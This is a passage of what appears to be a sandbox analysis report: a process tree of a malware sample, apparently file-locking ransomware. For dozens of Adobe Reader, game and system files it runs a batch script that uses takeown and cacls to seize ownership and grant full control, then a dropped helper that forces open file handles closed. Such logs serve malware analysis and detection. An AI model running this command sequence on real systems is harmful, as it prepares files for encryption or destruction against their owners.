    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C
    3⤵
    PID:656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CourierStd-Oblique.otf" -nobanner
    3⤵
    PID:1584
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CourierStd-Oblique.otf" -nobanner
      4⤵
      PID:1800
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""
  2⤵
  PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"
    3⤵
    - Modifies file permissions
    PID:1244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "SY______.PFM" -nobanner
    3⤵
    PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "SY______.PFM" -nobanner
      4⤵
      PID:1720
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""
  2⤵
  PID:888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C
    3⤵
    PID:620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
    3⤵
    - Modifies file permissions
    PID:1696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
    3⤵
    PID:1576
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
      4⤵
      PID:1728
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "can129.hsp" -nobanner
    3⤵
    PID:216
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "can129.hsp" -nobanner
      4⤵
      PID:1572
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"
    3⤵
    PID:316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "icudt26l.dat" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "icudt26l.dat" -nobanner
      4⤵
      PID:1472
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "ROMANIAN.TXT" -nobanner
    3⤵
    PID:1548
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "ROMANIAN.TXT" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""
  2⤵
  PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"
    3⤵
    - Modifies file permissions
    PID:2004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CP1258.TXT" -nobanner
    3⤵
    PID:1456
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CP1258.TXT" -nobanner
      4⤵
      PID:1300
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  2⤵
  PID:796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "br.gif" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "br.gif" -nobanner
      4⤵
      PID:1864
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:1584
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:1700
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1424
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:1316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    - Modifies file permissions
    PID:2044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:1548
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:1468
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:1456
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:1704
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  2⤵
  PID:1716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
    3⤵
    - Modifies file permissions
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "AdobePiStd.otf" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "AdobePiStd.otf" -nobanner
      4⤵
      PID:1400
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:1948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:1584
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:1752
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:1192
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    - Modifies file permissions
    PID:1364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:1520
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:1432
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:1456
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:1944
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1188
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
    3⤵
    PID:1400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "usa03.ths" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "usa03.ths" -nobanner
      4⤵
      PID:1936
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1264
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    - Modifies file permissions
    PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:1584
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:2000
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    - Modifies file permissions
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:1520
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:1152
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  PID:1704
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      PID:796
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1716
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    PID:1088
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      PID:1472
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
  2⤵
  PID:1968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "PurblePlaceMCE.png" -nobanner
    3⤵
    PID:1152
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "PurblePlaceMCE.png" -nobanner
      4⤵
      PID:1436
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "SolitaireMCE.png" -nobanner
    3⤵
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "SolitaireMCE.png" -nobanner
      4⤵
      PID:1264
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""
  2⤵
  PID:1704
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
    3⤵
    PID:836
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
      4⤵
      PID:1012
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1468
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "background.png" -nobanner
      4⤵
      PID:1080
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  2⤵
  PID:1864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
    3⤵
    PID:1456
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "distribute_form.gif" -nobanner
    3⤵
    PID:1728
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "distribute_form.gif" -nobanner
      4⤵
      PID:1856
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1696
- C:\Windows\SysWOW64\cmd.exe
